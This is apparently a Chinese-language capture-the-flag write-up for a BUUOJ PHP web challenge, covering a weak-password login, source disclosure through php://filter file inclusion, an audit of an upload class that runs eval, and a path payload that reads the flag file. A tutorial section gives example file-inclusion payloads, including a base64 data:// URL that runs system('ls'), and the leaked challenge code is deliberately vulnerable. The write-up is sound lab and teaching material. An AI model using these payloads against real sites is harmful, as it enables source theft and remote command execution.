进入题目页面如下
是一个登陆界面,尝试万能密码登录
当输入带有符号的用户名时,提示用户不存在,那尝试
弱口令密码
用户名:admin
密码:password
可以,登陆上去了,页面如下
难道是文件上传?
上传了一句话木马的文件并没有显示上传成功及文件路径,上传带有木马的图片转化成了文本且显示太大了
应该换个思路
发现URL里有传参?file=upload
想要获取源码,猜测需要构造伪协议
构造伪协议
1、home.php
php">http//:a6e52924-fe4f-43a7-8bec-59cf51b383c6.node5.buuoj.cn:81/home.php?file=php://filter/convert.base64-encode/resource=home2、upload.php
php">http//:a6e52924-fe4f-43a7-8bec-59cf51b383c6.node5.buuoj.cn:81/home.php?file=php://filter/convert.base64-encode/resource=upload伪协议知识点
在 Web 安全测试和开发过程中,有时候需要利用伪协议来获取目标文件的源码
PHP 环境下的伪协议利用
1. php://filter 伪协议
- 原理:
php://filter伪协议允许你在读取文件内容之前对其进行过滤,例如进行 base64 编码,这样可以绕过一些文件包含的限制,并且避免直接执行文件中的代码。 - 假设存在一个文件包含漏洞,目标代码如下
php"><?php
$file = $_GET['file'];
include($file);
?>
可以构造如下 URL 来获取目标文件的源码
http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=target_file.php
- 解释:
获取到 base64 编码后的内容后,在本地进行解码即可得到目标文件的源码。
2. data://text/plain 伪协议
- 原理:
data://text/plain伪协议允许你直接在 URL 中嵌入数据,并将其作为文件内容进行处理。 - 针对上述文件包含漏洞,可以构造如下 URL
http://example.com/index.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyAiKTs/Pg==
这里 PD9waHAgc3lzdGVtKCJscyAiKTs/Pg== 是 <?php system("ls ");?> 的 base64 编码。
- 解释:
data://text/plain是伪协议名称。;base64表示后面的数据是经过 base64 编码的。- 编码后的数据就是要执行或包含的内容。
Java 环境下的伪协议利用
1. jar: 伪协议
- 原理:
jar:伪协议可以用来访问 JAR 文件中的资源。在一些存在文件包含或资源加载漏洞的 Java 应用中,可以利用该伪协议来获取 JAR 文件中的源码。 - 假设存在一个 Java 应用,通过
URLClassLoader加载外部资源,攻击者可以构造如下 URL:
jar:file:/path/to/your.jar!/com/example/YourClass.class
- 解释:
jar:是伪协议名称。file:/path/to/your.jar指定 JAR 文件的路径。!/com/example/YourClass.class指定 JAR 文件中要访问的具体类文件。
访问后得到的页面如下
需要对以上base64编码解码,可以使用下面这个在线工具
base64解码 base64编码 在线base64解码/编码工具 iP138在线工具
1、home.php源码
php"><?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){if(isset($_GET['file'])){if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){die("hacker!");}else{if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){$file = $_GET['file'].".php";}else{$file = $_GET['file'].".fxxkyou!";}echo "当前引用的是 ".$file;require $file;}}else{die("no permission!");}
}
?>2、upload.php源码
php"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data">上传文件<input type="file" name="file" /><input type="submit" name="submit" value="上传" />
</form><?php
error_reporting(0);
class Uploader{public $Filename;public $cmd;public $token;function __construct(){$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";$ext = ".txt";@mkdir($sandbox, 0777, true);if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){$this->Filename = $_GET['name'];}else{$this->Filename = $sandbox.$_SESSION['user'].$ext;}$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";$this->token = $_SESSION['user'];}function upload($file){global $sandbox;global $ext;if(preg_match("[^a-z0-9]", $this->Filename)){$this->cmd = "die('illegal filename!');";}else{if($file['size'] > 1024){$this->cmd = "die('you are too big (′▽`〃)');";}else{$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";}}}function __toString(){global $sandbox;global $ext;// return $sandbox.$this->Filename.$ext;return $this->Filename;}function __destruct(){if($this->token != $_SESSION['user']){$this->cmd = "die('check token falied!');";}eval($this->cmd);}
}if(isset($_FILES['file'])) {$uploader = new Uploader();$uploader->upload($_FILES["file"]);if(@file_get_contents($uploader)){echo "下面是你上传的文件:<br>".$uploader."<br>";echo file_get_contents($uploader);}
}?>代码审计
类 Uploader:
构造函数 __construct:
生成一个沙盒目录,路径为当前工作目录下的 uploads 文件夹,以用户会话中的 user 值的 MD5 哈希命名。
若 $_GET['name'] 存在且不包含特定的危险字符串(如 data://、filter://、php:// 或 .),则将其赋值给 $Filename;否则,使用沙盒目录和用户会话中的 user 值加上 .txt 扩展名作为文件名。
初始化 $cmd 为一个提示信息,$token 为用户会话中的 user 值。
方法 upload:
若 $Filename 包含非字母数字字符,将 $cmd 设置为输出非法文件名的错误信息。
若上传文件大小超过 1024 字节,将 $cmd 设置为输出文件过大的错误信息。
若以上条件都不满足,将 $cmd 设置为使用 move_uploaded_file 函数将上传文件移动到指定位置的代码。
魔术方法 __toString:返回 $Filename 的值。
析构函数 __destruct:
检查 $token 是否与用户会话中的 user 值相等,若不相等,将 $cmd 设置为输出令牌检查失败的错误信息。
执行 $cmd 中的代码。
主程序逻辑:
若存在上传文件,创建 Uploader 对象并调用 upload 方法处理上传文件。
尝试读取上传文件的内容,若成功则输出文件路径和内容。
重点看以下代码
有file_get_contents($uploader)函数,这是一个读取文件的函数,猜测可以读取flag文件,通过修改Filename参数来读取flag信息
构造payload如下
php">http://7273c8cf-da67-4fc9-b0e5-8a1691cef3f8.node5.buuoj.cn:81/home.php?file=upload&name=/var/www/html/flag.php访问后,上传一个按照规定内的文件,最后利用burpsuite抓包,得到flag
